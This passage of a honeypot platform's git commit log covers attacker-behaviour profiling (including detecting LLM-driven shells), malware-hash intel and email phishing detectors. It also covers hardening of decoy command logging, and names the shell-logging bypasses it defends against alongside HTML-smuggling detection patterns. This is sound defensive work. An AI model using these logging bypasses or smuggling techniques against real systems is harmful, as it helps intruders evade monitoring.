re-invoked) per the 2026-05-02 empirical anchor.

* _features/cognitive.py:command_branch_diversity(ctx) emits one
  Observation in {linear_playbook, adaptive_branching, unknown}.
* unique_first_token_hashes / total_commands ratio. ≥ 0.80 →
  linear_playbook, otherwise adaptive_branching (the doc instructs
  bias-to-adaptive in the middle band — that's the discriminative
  signal we actually want).
* < 5 commands → "unknown" at confidence 1.0 (the absence of data
  is itself a high-confidence answer per the registry's allowed
  vocabulary). Zero-command session skips emission entirely.

Tests cover unique-tokens → linear, repeated-tokens → adaptive,
middle band → adaptive (bias), under-floor → unknown @ 1.0, plus
PII regression: raw tokens never appear in the serialised
observation.
2026-05-03 07:54:13 -04:00
e52a0e0381 feat(profiler/behave_shell): emit cognitive.inter_command_latency_class
BEHAVE-EXTRACTOR.md Phase A Step 5. Classifies the operator's
thinking pace between commands. Splits LW-sim / CLAUDE-FF /
CLAUDE-CL.

* _features/cognitive.py:inter_command_latency_class(ctx) emits one
  Observation in {instant, typing_speed, deliberate,
  llm_lightweight, llm_heavyweight, long}, computed as the median
  of ctx.inter_cmd_iats bucketed against the prototype thresholds
  (v0.2 split: lightweight 2-8s, heavyweight 8-30s).
* Sample-size honesty: < 5 commands halves confidence (0.40 vs
  0.80) per BEHAVE-EXTRACTOR.md.
* Threshold consts (INTER_CMD_*_MAX, MIN_COMMANDS_FOR_FULL_CONFIDENCE,
  plus parked Step 6/7/8 thresholds for the next three commits)
  added to _thresholds.py.

Tests cover all six buckets at empirically-anchored IATs (15s ≈
Claude Opus driving recon via tmux send-keys), plus the
single-command no-IAT and low-sample-count paths.
2026-05-03 07:52:39 -04:00
f3880b24d1 feat(profiler/behave_shell): command segmentation in SessionContext
BEHAVE-EXTRACTOR.md Phase A Step 4. Pure refactor inside _ctx.py —
no new feature emits. Lays the shared utility for the three
cognitive primitives next in line (Steps 5-7).

* Command dataclass (frozen): start_ts, end_ts, first_token_hash.
  PII-safe by construction — only the first whitespace-delimited
  token of the command is retained, and only as a sha256 hash
  (decnet/profiler/behave_shell/_parse.py:hash_token).
* _segment_commands walks input events char-by-char, splits on
  \r / \n, hashes the first token, drops the rest.
* SessionContext gains commands, inter_cmd_iats, output_per_cmd.
  output_per_cmd[i] counts bytes between commands[i].end_ts and
  commands[i+1].start_ts — the natural pairing for Step 7
  (feedback_loop_engagement).

Tests: empty / unterminated streams, single command (CR + LF
terminators), paste-with-newline, multi-command IAT pairing,
output-byte counting between boundaries, blank-line skip,
first-token-only PII discipline.
2026-05-03 07:50:55 -04:00
6763fceb0b feat(profiler/behave_shell): emit motor.paste_burst_rate
BEHAVE-EXTRACTOR.md Phase A Step 3. Same paste-event ratio as
motor.input_modality but coarser-bucketed: this is the *habit*
signal (does the operator reach for paste at all?), where
input_modality is the dominant-channel signal.

* _features/motor.py:paste_burst_rate(ctx) emits one Observation
  per session in {none, occasional, habitual} with confidence
  0.70 / 0.70 / 0.80.
* Thresholds: PASTE_RATE_OCCASIONAL_MIN=0.10,
  PASTE_RATE_HABITUAL_MIN=0.50.

Splits YOU-sim from LW/CLAUDE-FF/CLAUDE-CL — LLM-driven sessions
paste habitually, real humans rarely paste.

Tests: pure-typed → none; 1-paste-in-10 → occasional;
paste-majority → habitual; output-only → no observation; habitual
confidence > occasional confidence.
2026-05-03 07:49:03 -04:00
879f5e731b feat(profiler/behave_shell): emit motor.input_modality
BEHAVE-EXTRACTOR.md Phase A Step 2. The first primitive — picked
first because it has the highest discriminative value (HUMAN vs
everyone) and the simplest implementation (paste-event ratio over
total inputs).

* _features/motor.py:input_modality(ctx) emits one Observation
  per session in {typed, pasted, mixed} with confidence 0.75 / 0.70.
* _features/_emit.py centralises the make_observation helper so
  every feature module gets the same Window/source/evidence_ref
  boilerplate without copy-paste.
* Thresholds inherited from the prototype's calibration history
  (MODALITY_PASTED_MIN=0.40, MODALITY_TYPED_MAX=0.05).
* Zero-input session skips emission — registry doesn't admit
  "unknown" here.

Tests: pure-typed → typed, pure-pasted → pasted, mixed → mixed,
output-only session → no observation, full envelope round-trip.
2026-05-03 07:47:38 -04:00
c9a81a23c2 feat(profiler/behave_shell): asciinema parser + paste-burst detection
BEHAVE-EXTRACTOR.md Phase A Step 1. Lays the shared primitives that
Steps 2-3 (motor.input_modality, motor.paste_burst_rate) will
consume:

* parse_shard_line / parse_shard turn a shard JSONL line/file into
  AsciinemaEvents, skipping headers and malformed records.
* PasteBurst dataclass + _detect_paste_bursts group consecutive
  paste-class input events (len(d) >= 4 chars per the prototype's
  empirical floor) into contiguous bursts, splitting on IAT gaps
  larger than PASTE_BURST_MAX_IAT_S (200ms).
* SessionContext now carries iats and paste_bursts derivations.
* Threshold constants harvested from
  BEHAVE/prototype_extractors/shell/extract.py — calibrated against
  the five 2026-05-02 shards.

Tests cover pure-typed, pure-pasted, mixed streams; close vs far
paste events; typed events breaking a burst; PasteBurst immutability;
and the JSON parser's junk handling.
2026-05-03 07:46:01 -04:00
f8eae04e5d feat(profiler/behave_shell): scaffold extract_session entry point
BEHAVE-EXTRACTOR.md Phase A Step 0. Lays the package skeleton
(__init__/extract/_parse/_ctx/_thresholds/_features) with empty
FEATURES = (), so the worker plumbing in BEHAVE-INTEGRATION Phase 4
has a stable import path before any primitive lands.

extract_session() builds a SessionContext once and fans the
registered feature functions across it; at Step 0 that fan-out is
empty and the function yields nothing. Step 1 (asciinema parser +
paste-burst detector) and Step 2 (motor.input_modality) land next.

Smoke suite asserts the empty contract: empty stream → no
observations, single event → t_start == t_end, multi-event → events
routed into input_events / output_events by kind, evidence_ref
defaults to "session:<sid>" or honours an explicit override.
2026-05-03 07:42:09 -04:00
a2a61b636e feat(web): drop SessionProfile, wire observations into AttackerDetail (DEBT-050 / DEBT-036 closure)
Destructive half of BEHAVE-INTEGRATION.md Phase 1. SessionProfile +
its kd_* columns + the dialect ALTER TABLE migration helpers are
deleted outright; pre-v1, the table shipped empty, no migration
ceremony required (per the no-new-_migrate_-pre-v1 memory rule).
DEBT-036 closes via DEBT-050 supersedure. AttackerDetail's
``observations`` field is wired to the new ``observations`` table
and returns an empty list until the BEHAVE-SHELL extractor (DEBT-050
Phase 2) starts emitting.

decnet/web/db/models/attackers.py — SessionProfile class deleted
(~135 lines), KD_PAUSE_*/KD_START_OF_ACTION_IDLE_S module constants
deleted, module docstring updated to point at the observations
table. AttackerIdentity.kd_digraph_simhash is KEPT — it's the v2
federation centroid hook, not a SessionProfile field; docstring
repointed to the BEHAVE primitive that will populate it.

decnet/web/db/sqlmodel_repo/attackers/sessions.py — DELETED.
SessionProfilesMixin dropped from the AttackersMixin MRO.

decnet/web/db/repository.py — abstract upsert_session_profile +
get_session_profile removed.

decnet/web/db/sqlite/repository.py + mysql/repository.py —
_migrate_session_profile_table helpers and their initialize() calls
removed. mysql initialize() now goes attackers → column_types →
admin (no session_profile step).

decnet/web/db/models/__init__.py — SessionProfile re-export gone.

decnet/web/db/models/attacker_intel.py — docstring cross-reference
to SessionProfile.schema_version retargeted to AttackerIdentity.

decnet/web/router/attackers/api_get_attacker_detail.py — adds
``observations: []`` to the response by calling
``repo.latest_observation_per_primitive(uuid)`` and projecting to a
list sorted by primitive path. Empty until the extractor lands;
shape matches BEHAVE-INTEGRATION.md §"AttackerDetail consumer".

tests/profiler/test_session_profile.py — DELETED (56 lines).
tests/db/test_base_repo.py — DummyRepo loses upsert_session_profile
and get_session_profile overrides.
tests/db/mysql/test_mysql_migration.py — initialize-call-order
assertion updated; session_profile step removed from the expected
sequence; docstring records why.
tests/ttp/test_lifter_absence.py — docstring "no SessionProfile" →
"no ObservationRow".
2026-05-03 07:33:37 -04:00
0972325527 feat(web/db): observations table + repo + bus prefix (BEHAVE-INTEGRATION Phase 1)
Additive Phase 1 of BEHAVE-INTEGRATION.md. Lays the storage layer
the BEHAVE-SHELL extractor (DEBT-050) will write into. Nothing
breaks; SessionProfile coexists for now and is dropped in the
follow-up commit.

decnet/web/db/models/observations.py — new ObservationRow SQLModel
mirroring the BEHAVE Observation envelope field-for-field
(core/decnet_behave_core/spec/envelope.py). ``id`` is a hex-string
UUID (matching BEHAVE), not a typed UUID column. ``identity_ref``
is str | None — written by the future attribution engine, NULL
until then. ``attacker_uuid`` is the one DECNET-side
denormalisation; FK'd to attackers.uuid for cheap AttackerDetail
joins. ``evidence_ref`` is NOT NULL for DECNET emissions even
though the upstream envelope makes it optional — the worker's
"already profiled?" check keys on it. UniqueConstraint(evidence_ref,
primitive) enforces idempotency at the schema level so re-running
the extractor on the same shard+sid produces a DB-side conflict
the upsert path resolves deterministically. Class is named
``ObservationRow`` (not ``Observation``) to avoid colliding with
the BEHAVE Pydantic envelope at sites that import both.

decnet/web/db/sqlmodel_repo/observations.py — ObservationsMixin.
Three public methods backing the canonical queries from
BEHAVE-INTEGRATION.md §"Storage": ``upsert_observation`` (idempotent
on the natural key), ``latest_observation_per_primitive`` (per-
primitive MAX(ts) subquery, portable across SQLite and MySQL — no
DISTINCT ON), ``observations_time_series`` (asc-by-ts). Plus
``has_observations_for_evidence`` for the worker's session-already-
profiled check.

decnet/bus/topics.py — ATTACKER_OBSERVATION_PREFIX = "observation"
constant + ``attacker_observation(primitive)`` builder. Full topic
shape ``attacker.observation.<primitive>`` matches what BEHAVE's
spec.event_adapter.event_topic_for produces upstream. Documentation
+ pattern matching only — bus auth is socket file perms (DEBT-029
§2), not topic-level.

decnet/web/db/repository.py — abstract ``upsert_observation``,
``latest_observation_per_primitive``, ``observations_time_series``
on BaseRepository.

tests/db/test_observations.py — 11 tests covering upsert round-trip,
idempotency under the unique constraint, latest-per-primitive
ordering across multiple sessions, time-series asc-ordering, empty-
attacker contract, every BEHAVE ValueKind round-tripping through
the JSON column, and the has_observations_for_evidence check.

tests/db/test_base_repo.py — DummyRepo gains the three new abstract
overrides so its coverage suite still instantiates.
2026-05-03 07:25:10 -04:00
11f474556c docs(behave): integration + extractor + attribution design (DEBT-050 / 051)
Three sibling design docs plus DEBT.md updates that supersede the
stale DEBT-036 with a BEHAVE-aligned plan.

development/BEHAVE-INTEGRATION.md — five-phase rollout: storage
(observations table mirroring the BEHAVE Observation envelope plus
one DECNET-side denorm; UniqueConstraint(evidence_ref, primitive)
enforcing idempotency); engine (in decnet/profiler/behave_shell/
sublibrary, no new daemon, not in BEHAVE — DECNET is the engine);
BEHAVE pin; worker wire; UI panel + per-attacker SSE route; live
smoke. Bus payload merges id/ts/v back in to preserve sensor
identifiers across the bus envelope.

development/BEHAVE-EXTRACTOR.md — engine route in eight phases
(A–H). Phase A locks the 6-primitive calibration grid; Phases B–G
expand horizontally; Phase H is the full Tier-A corpus + v0
release. v0 ships every shell-extractable primitive (37 of them);
Tier B is cross-session and lives in the attribution engine; Tier
C is network-domain (toolchain.*) and lives elsewhere.

development/ATTRIBUTION-ENGINE.md — sublibrary inside
decnet/correlation/ that consumes attacker.observation.* events
and emits attribution.profile.* derived state. Five-state machine
(unknown / stable / drifting / conflicted / multi_actor) with per-
ValueKind merge functions. v0 closes DEBT-051; v1 adds the real
clusterer; v2 federation gossip. The bright line forbidding
attribution to natural persons is lifted directly from BEHAVE's
envelope docstring.

development/DEBT.md — DEBT-036 marked STALE; DEBT-050 and
DEBT-051 entries added; summary table + open list updated.
2026-05-03 07:24:19 -04:00
3f080f601d feat(intel,ingester): mal_hash feed + observed_attachments table (DEBT-046)
New MalHashProvider sibling ABC (decnet/intel/base.py) since SHA-256
is a different keyspace from IntelProvider's IPs. MalwareBazaarProvider
mirrors FeodoProvider's bulk-feed shape: 24h refresh via _ensure_fresh
/ _refresh, in-memory set[str] of hex-lowercased hashes, set-membership
lookup. Auth-keyed via DECNET_MALWAREBAZAAR_AUTH_KEY; absent key
silent-no-ops the lane (single warning, no HTTP traffic).

Per-hash observations persist to a new observed_attachments table.
DECNET is a honeypot platform — every attachment hash an attacker
delivers is intel, regardless of whether anyone classified it. Verdict
is sticky: True never downgrades to False/None on subsequent
observations. Out of scope: API surface, federation export, retention.

Ingester _publish_email_received calls the provider for each attachment
sha256, sets mal_hash_match on the bus payload (omitted entirely when
the message had no attachments — keeps R0046's `is True` predicate
silent on hash-less mail, matching pre-paydown behavior), and upserts
the row regardless of provider availability.
2026-05-03 05:56:46 -04:00
03beff3840 feat(orchestrator): authoritative failure-count badge endpoint (DEBT-042)
New GET /api/v1/orchestrator/events/stats?since=1h&success=false&kind=...
backed by repo.count_orchestrator_failures(since_ts, kind), which
counts failed rows across both orchestrator_events and
orchestrator_emails since the cutoff.

Window parser accepts ^\d+[smhd]$, capped at 7d. Today only
success=false is accepted on this surface so the endpoint isn't
accidentally repurposed before the next consumer is properly
designed.

Orchestrator.tsx polls the endpoint on mount + every 30 s and
renders the authoritative DB-derived count instead of deriving from
the in-memory SSE buffer + one paginated page (which silently
excluded failures older than the local window).
2026-05-03 05:26:45 -04:00
866a76eccf test(web): scaffold vitest + RTL with Orchestrator seed suite (DEBT-043)
Wire vitest 4 + jsdom + @testing-library/{react,jest-dom,user-event}
+ @vitest/coverage-v8 through vite.config.ts (defineConfig from
vitest/config). src/test/setup.ts registers jest-dom matchers and
RTL cleanup. tsconfig.app.json picks up vitest/globals types.

Seed suite Orchestrator.test.tsx covers the three regressions
called out in DEBT-043: empty-state render, kind-filter toggling
triggers a scoped refetch, mocked stream callback prepends a row.
2026-05-03 05:20:01 -04:00
6c6f97e840 feat(prober,correlation): attacker fingerprint rotation detection (DEBT-032)
When the prober observes a NEW hash for an
(attacker_uuid, port, probe_type) triple it has seen before — VPS
rotation, SSH server rebuild, TLS cert swap — emit a derived
attacker.fingerprint_rotated event carrying both old and new hash.
Detection is a small library (decnet.correlation.fingerprint_rotation)
called inline from the prober at each of the three emit sites
(JARM/HASSH/TCPFP). No new daemon. New AttackerFingerprintState table
holds per-triple last-hash state; Attacker.rotation_count and
Attacker.last_rotation_at are stamped on every diff. Library is sync,
fully unit-tested via injected publish_fn / syslog_fn callbacks.
2026-05-03 05:12:51 -04:00
dcd558fd91 chore(infra): pin Docker base images by digest (DEBT-023)
All base images (debian:bookworm-slim, ubuntu:22.04, ubuntu:20.04,
rockylinux:9-minimal, centos:7, alpine:3.19, fedora:39,
kalilinux/kali-rolling, archlinux:latest, honeynet/conpot:latest)
now carry their resolved sha256 digest so 'docker pull' is
deterministic. :tag retained for human readability; @sha256 is what
Docker actually resolves. Refresh procedure documented at the top of
decnet/distros.py.
2026-05-03 04:38:39 -04:00
6e19d3a25a chore(bait): scaffold default seed dir with README
Empty directory tracked via .gitkeep so operators see it on first
clone; README documents the .eml/.json drop-in flow that the IMAP/POP3
compose fragments wire up by default.
2026-05-03 04:30:09 -04:00
b3a96a045f feat(mail): default email_seed → \$PROJROOT/bait/ when unset
When service_cfg["email_seed"] is absent, compose_fragment now falls
back to $PROJROOT/bait/ if that directory exists on the host. Lets
operators drop a deployment-wide bait corpus into one place without
threading email_seed through every decky's config. Missing dir keeps
old no-op behavior.
2026-05-03 04:25:24 -04:00
b88d67794d feat(mail): operator-tunable IMAP/POP3 email seed (DEBT-026)
IMAP_EMAIL_SEED / POP3_EMAIL_SEED accept a directory (rglob *.eml +
*.json) or a single .json/.eml. Loaded entries CONCATENATE with the
hardcoded _BAIT_EMAILS — additive to the realism-engine emailgen
output rather than replacing it. JSON dicts require from_addr /
to_addr / subject / body; bare bodies are wrapped into RFC 5322 on
load. compose_fragment reads service_cfg["email_seed"] and bind-mounts
the host path read-only at /var/spool/decnet-emails/seed.
2026-05-03 02:47:06 -04:00
e0b07651fd docs(debt): mark DEBT-047 resolved (EmailLifter disk-reach + ttp agent gate) 2026-05-02 20:07:54 -04:00
79674026dd feat(cli): allow decnet ttp on agents (DEBT-047)
The TTP-tagging worker is now safe to run on agent hosts: EmailLifter
disk-reaches body-aware predicates from the local artifacts tree
(DEBT-035 unblocked filesystem access; DEBT-047 added the helper).

Drop `ttp` from MASTER_ONLY_COMMANDS in cli/gating.py and remove the
defence-in-depth `_require_master_mode("ttp")` call in cli/ttp.py.
`ttp-backfill` walks the master DB and stays master-only.
2026-05-02 20:07:03 -04:00
e972d870de feat(ttp): EmailLifter disk-reach for body-aware predicates (DEBT-047)
R0047 (BEC) and the encoded-payload predicate substring-match against
the email body. Shipping raw body text on the abstracted service bus
is the wrong privacy stance — the bus transport may swap from UNIX
socket to networked at any time, and "loopback today" is not a license
to put PII on the wire.

EmailLifter now opens the .eml lazily from
/var/lib/decnet/artifacts/{decky_id}/smtp/{stored_as} when a body-aware
predicate runs and parses the body in-process via stdlib email +
policy.default. The decoded body is memoized into the payload dict so
multiple body-aware predicates on the same event open the file once.

Bus envelope only carries the artifact pointer (decky_id + stored_as);
raw body bytes never cross the host disk boundary on the agent → master
hop. Filesystem access on agents is unblocked by DEBT-035 (setgid +
group-readable artifacts root, paid 2026-05-02).

The legacy inline body_text path is preserved — when the producer ships
body_text on the bus the helper short-circuits without opening the file.
2026-05-02 20:05:54 -04:00
7036a86e76 refactor(artifacts): extract resolve_artifact_path to shared module
Move artifact path validation + symlink-escape check out of the
admin-gated download endpoint into decnet/artifacts/paths.py so the
TTP EmailLifter can disk-reach .eml files at tag-time without
duplicating regex/root logic (DEBT-047).

The router now catches ArtifactPathError and re-raises HTTPException(400);
behavior is unchanged.
2026-05-02 20:02:47 -04:00
cdbb3d3571 fix(ssh,telnet): move PROMPT_COMMAND out of /root/.bashrc + pin readonly
ANTI flagged two regressions in the existing command-event capture:

1. **Tell**: PROMPT_COMMAND lived in /root/.bashrc, the FIRST file
   an attacker greps after landing root. The logger invocation
   sitting there is plain-text honeypot signage.
2. **Bypass**: even when missed, `export PROMPT_COMMAND=""` silently
   disables capture. ANTI personally bypasses this on engagements.

Reshape:

* Move the assignment to **/etc/environment** — read by pam_env at
  session open (sshd via /etc/pam.d/sshd, telnet via
  /etc/pam.d/login), before any shell rc file fires. Far less
  obvious than .bashrc; a casual `cat .bashrc` no longer surfaces
  the capture.
* Define the helper as a function `__bash_history_sync` in
  **/etc/bash.bashrc** (system-wide bashrc, sourced by every
  interactive bash). Function name reads as generic bash
  housekeeping; no DECNET branding in the symbol.
* Pin both the function and PROMPT_COMMAND **readonly** so
  `export PROMPT_COMMAND=""` fails with "readonly variable"
  instead of silently winning. Mitigation, not airtight —
  `bash --norc` still bypasses — but the passive `export`
  bypass is closed.

The actual `logger --rfc5424 --msgid command ... CMD ...` invocation
is preserved exactly; only its location and the readonly guard
change. R0001–R0030 (command-rule pack) consume the same syslog
shape as before.

Three new tests assert: the value lands in /etc/environment, the
function body lives in /etc/bash.bashrc, no PROMPT_COMMAND line
remains in /root/.bashrc, and `readonly PROMPT_COMMAND` /
`readonly -f __bash_history_sync` are both present. Mirror
assertions added on the Telnet Dockerfile via
test_config_schema.py.
2026-05-02 19:50:24 -04:00
3e9c4c29b9 feat(ssh,telnet): add non-root user account for privesc + enum lure
Real Linux deployments (especially Ubuntu cloud images) ship a non-
root admin user; honeypots that only accept root logins are a tell.
Add a second account on both SSH and Telnet decoys, configurable
via service_cfg keys `user` / `user_password`, defaulting to
`ubuntu` / `admin` so the lure is live on every fresh deploy.

* `decnet/services/{ssh,telnet}.py` — two new ServiceConfigFields
  (`user` string, `user_password` secret) and matching env vars
  (`SSH_USER` / `SSH_USER_PASSWORD`, mirror for telnet) propagated
  via the compose fragment.
* `decnet/templates/ssh/entrypoint.sh` — runtime `useradd -m -s
  /usr/libexec/login-session -G sudo "$SSH_USER"` so the new user
  inherits the same sessrec pty-recording shell as root and lands
  in the sudo group. Privesc attempts (`sudo`) flow through the
  existing sudo-log capture; network-enum from the user's shell
  rides the recorded transcript.
* `decnet/templates/telnet/entrypoint.sh` — same useradd pattern
  (no sudo group — busybox+login telnet image has no sudo
  package; privesc rides `su -` which itself flows through the
  existing PAM auth-helper at /etc/pam.d/login).
* New tests for default + custom user / password + independence
  from root password. Updated the schema-keys assertion to match
  the four-field shape.

The new account is ALSO the natural home for the body-aware
predicates that were previously gated on root-only sessions —
attackers who land on `ubuntu@host` and run network-recon /
privesc commands now generate the same structured TTP-rule
events as root sessions did, captured via the same auth-helper
+ sessrec + sudo-log pipes.
2026-05-02 19:48:03 -04:00
c675bd26cf docs(debt): mark DEBT-035 resolved; lift DEBT-047 filesystem-access blocker
DEBT-035 (artifacts written as the container uid, not the API's) is
resolved by the two preceding commits:
* 39a298f6 — persists DECNET-service api-user/api-group as names in
  decnet.ini for any future composer / worker that wants to resolve
  the local uid via pwd.getpwnam.
* b2733216 — creates /var/lib/decnet/artifacts at init time with mode
  0o2775 (setgid + group-write) owned by the DECNET-service
  user:group.

The setgid bit is the load-bearing fix: Linux mkdir(2) propagates a
parent's group AND its setgid bit to every new subdirectory. Docker
auto-creates the per-decoy / per-service subtree as bind-mounts fire,
so those subdirs come up with group=decnet and setgid set; container
file writes (default umask 0o022 → mode 0o644) inherit the decnet
group; the API process and the local TTP worker (both running as the
DECNET-service user, primary group decnet) read via group-read.

The original recommendation of compose `user:` injection turned out
infeasible for SSH and Telnet — PAM's setuid(2) during login
fundamentally cannot run from a non-root container. Setgid covers
both root-internal and unprivileged-internal templates uniformly
without requiring per-template carve-outs.

DEBT-047 (R0047 BEC disk-reach) was gated on DEBT-035 for filesystem
access. That blocker is lifted — `decnet ttp` running on agents as
the local DECNET-service user can now read .eml files written by
the SMTP decoy. The remaining DEBT-047 work is the master-only gate
flip in decnet/cli/gating.py and the EmailLifter disk-reach helper
itself (factor _resolve_artifact_path out of the artifacts API
endpoint into a shared module).

Soft-fail paths in api_get_transcript.py and api_get_artifact.py
stay as defence-in-depth — option 2 should make them never fire on
a healthy install but a misconfigured deploy must not 500 the API.
2026-05-02 19:40:12 -04:00
b27332169d feat(init): create /var/lib/decnet/artifacts with setgid + group-write
DEBT-035 step 2. Today the artifacts subtree is auto-created by
Docker as root when a decoy container's bind-mount fires for the
first time. The resulting permissions are root:root 0o755 — the API
process (running as the decnet user) hits PermissionError trying to
read transcripts written by the container, and the soft-fail 404
path gets exercised on every fresh deploy.

Add `/var/lib/decnet/artifacts` to init's dirs list with mode 0o2775:

* 0o2000 — setgid bit. New files inherit the directory's group
  (decnet), regardless of which uid created them. This is the load-
  bearing bit for cross-container reads.
* 0o0775 — owner+group rwx, world rx. Group-write lets the API
  process and the local TTP worker read each other's outputs
  without a manual chown.

`_ensure_dir` already respects the full mode word via `os.chmod`,
no helper change needed.

Test asserts the resulting directory carries exactly 0o2775 after
a fresh `decnet init --prefix`. Defence-in-depth: this works even
if the per-decoy compose `user:` directive (next commit) misses a
template — files still land in the decnet group.
2026-05-02 19:35:20 -04:00
39a298f685 feat(init): persist DECNET-service api-user/api-group to decnet.ini
DEBT-035 step 1. The composer needs to know which uid/gid to inject
into each compose fragment's `user:` directive at deploy time. Today
the resolved `--user` / `--group` values reach systemd unit
rendering (init.py:349–354) but are not persisted anywhere the
composer can read them.

Persist as **names** (not numeric ids) under `[decnet] api-user` /
`api-group` in the rendered decnet.ini placeholder. Resolution to
uid/gid happens at deploy time on whichever host runs the deploy,
via `pwd.getpwnam(...)` / `grp.getgrnam(...)` — so the same user
name can have different uids on master vs agents (heterogeneous
/etc/passwd) without breaking artifact ownership. The existing
config_ini auto-translates kebab→DECNET_API_USER / DECNET_API_GROUP
at load time; no domain-map changes needed.

Two new tests: one asserting the rendered ini carries the
`api-user` / `api-group` keys for the values passed to `--user` /
`--group`; one round-tripping through `load_ini_config` to confirm
the env vars land in `os.environ` for the composer to pick up.
2026-05-02 19:33:53 -04:00
b3ea3fa925 docs(debt): merge rogue root DEBT.md into the canonical development/DEBT.md
A previous agent (and several of my own commits) wrote to a top-level
DEBT.md without seeing the existing development/DEBT.md — the
canonical register since DEBT-001. Resulted in two parallel files,
inconsistent numbering schemes, and references that resolved to the
wrong place.

Migrate the six entries that landed in the rogue file into the
canonical register as DEBT-044 through DEBT-049, preserving their
status (resolved / partial / open) and cross-references. The
TTP_TAGGING.md references to "DEBT.md" already resolve to
development/DEBT.md by virtue of being in the same directory; only
the comment in decnet/ttp/impl/intel_lifter.py needed disambiguation
to "development/DEBT.md DEBT-048".

* DEBT-044 — `attacker.email.received` producer wiring ( RESOLVED 2026-05-02)
* DEBT-045 — EmailLifter heavyweight feature extraction (PARTIAL PAID 2026-05-02)
* DEBT-046 — EmailLifter mal-hash feed integration (open)
* DEBT-047 — EmailLifter R0047 BEC unblock (open, gated on DEBT-035)
* DEBT-048 — TTP intel provider mapping review (recurring quarterly)
* DEBT-049 — TTP Sigma adapter — post-v1 (open)

Summary table extended; "Remaining open" line updated; root file
removed. The DEBT-047 entry now explicitly cross-references DEBT-035
as the gating dependency for the R0047 BEC unblock.
2026-05-02 19:17:20 -04:00
17367d0a69 docs(debt,ttp): retire shipped lanes; file mal-hash-feed and R0047-disk-reach entries
Mark the EmailLifter heavyweight follow-up as PARTIAL PAID — R0042 /
R0046 (macro / password / smuggling lanes) / R0048 fire end-to-end
after commits 291b78c1 (decky extractors) and the ingester producer
projection that follows.

Two narrower DEBT entries replace the lanes that remain gated:

* "EmailLifter mal-hash feed integration" — R0046's mal_hash_match
  lane needs a curated bad-hash feed (MalwareBazaar SHA-256 dump as
  the v0 candidate, mirroring the FeodoProvider bulk-feed pattern at
  decnet/intel/feodo.py). Feed integration, not extraction. Lifter
  predicate already reads `payload.get("mal_hash_match")` — silent
  today only because the field is absent.
* "EmailLifter R0047 BEC — unblock when artifact disk-reach lands"
  cross-references the agent UID/GID DEBT entry that blocks
  `decnet ttp` from reading artifacts written by deckies on the
  same host. Disk-reach is the intended solution; raw body_text on
  the bus is rejected because the bus transport is abstracted (the
  UNIX-socket implementation may swap to networked at any time, and
  privacy decisions must hold regardless of transport).

Append to TTP_TAGGING.md §"Producer wiring": the email.received
producer pointer (was "none — DEBT"), the full per-message payload
shape with the new heavyweight fields, and an explanatory block on
why the bus is body-text-free + how R0047 / R0048 each handle their
body dependency (R0048 via the precomputed scalar; R0047 deferred).
2026-05-02 19:12:30 -04:00
c714941069 feat(bus): project EmailLifter heavyweight fields onto email.received
The decky's Layer-2 extension (commit 291b78c1) emits body_simhash /
body_base64_bytes / html_smuggling on the message_stored log and adds
macro_indicator / encrypted booleans to each attachments_json
manifest entry. Lift them all onto the email.received bus payload:

* body_simhash — passes through as-is (16 hex chars or "")
* body_base64_bytes — coerced to int (0 on absent / malformed)
* attachment_macros / attachment_password_protected — OR-reduced
  across the per-attachment manifest booleans; matches R0046's
  matched_trigger semantics where a single positive lane fires the
  rule
* html_smuggling — coerced bool from the decky's 0/1 int

Pre-Layer-2 message_stored events (older deckies, malformed log
rows) project to safe defaults: empty simhash, zero base64-bytes,
all booleans False — the EmailLifter then stays silent, never
fires a false positive on missing data.

R0042 (mass-phish) / R0046 macro / R0046 password / R0046 smuggling
/ R0048 (encoded payload) all fire end-to-end after this commit.
R0046 mal_hash_match and R0047 BEC remain deferred per their
respective DEBT entries (filed in the next commit).
2026-05-02 19:10:30 -04:00
291b78c1d0 feat(smtp): extract body_simhash + base64-bytes + html-smuggling + per-attachment macro/encrypted
Heavyweight Layer-2 extractors land alongside the cheap projections
shipped in commit e9324aca, so the EmailLifter R0042 / R0046 (macros
/ password / smuggling lanes) / R0048 fire from the bus payload
without the lifter having to reach back to disk.

Extractors:
* body_simhash — inlined 64-bit Charikar simhash (md5-keyed,
  frequency-weighted) over word tokens of the union of text/* body
  parts. Inlined rather than pulling the `simhash` PyPI dep, which
  transitively brings numpy ~50 MB into a slim decky container; the
  algorithm is ~15 lines and identical in extraction quality.
* body_base64_bytes — largest decoded base64 chunk's byte count,
  scanning text body parts with the same `_BASE64_RE` the lifter's
  `_p_encoded_payload` fallback uses. R0048 fires from this scalar
  alone; the lifter's body_text fallback becomes dead in normal
  operation.
* attachment_macro_indicator — stdlib zipfile sniff for
  `vbaProject.bin` inside OOXML containers. Catches modern .docm /
  .xlsm / .pptm and macro-injected .docx; legacy .xls (CFBF) is a
  follow-up.
* attachment_encrypted — flag_bits & 0x01 on any ZIP / OOXML entry's
  central directory; magic-byte match for 7z / RAR / CFBF (encrypted
  Office wrap).
* html_smuggling — structural lxml parse first: fires when an `<a
  download>` element coexists with a `<script>` referencing
  `Blob` / `Uint8Array` / `URL.createObjectURL`. Regex pair-check
  fallback on lxml parse failure (real-world phish HTML is often
  malformed). Cuts the FP rate that pure-regex would produce on
  legitimate "click to download" links.

Add `python3-lxml` (~5 MB Debian package, C-extension, no transitive
Python deps) to the SMTP decky's Dockerfile. simhash stays inline.
Per the dependency rule: lxml earns its weight by cutting R0046's
OR-combined FP rate; a heavier macro-detection lib (oletools ~5 MB
pure-python with msoffcrypto) would not measurably improve the
boolean signal we need, so stdlib stays for that lane.
2026-05-02 19:08:37 -04:00
fb85762703 feat(bus): publish email.received from ingester after SMTP artifact persist
Wires the EmailLifter (R0041–R0048) producer that DEBT.md item #3
deferred. After the existing add_bounty() call in _extract_bounty
(line 615), call _publish_email_received() which:

* resolves the attacker_uuid via repo.get_attacker_uuid_by_ip; drops
  the publish if unresolved (the TTP worker can't anchor orphan
  events)
* projects the message_stored fields onto the EmailLifter wire
  contract: from_domain / mail_from_domain / return_path_domain
  parsed via _domain_of, rcpt_count + rcpt_domains via
  _rcpt_projection, attachment_sha256s + attachment_extensions
  derived from the existing attachments_json manifest, urls from
  urls_json, dkim_signed/spf_pass coerced from 0/1 ints to bool
* mirrors _publish_probe_pending's bus-per-call pattern and
  swallows all exceptions (the bus is the notification layer, not
  the source of truth)

Fires for both relay and non-relay SMTP services. R0041 / R0043 /
R0044 / R0045 are now live end-to-end; R0046 partial (extension
lane). Heavyweight predicates (R0042 simhash, R0046-deep, R0047 /
R0048 body_text) stay deferred per the EmailLifter heavyweight
DEBT entry.
2026-05-02 18:39:13 -04:00
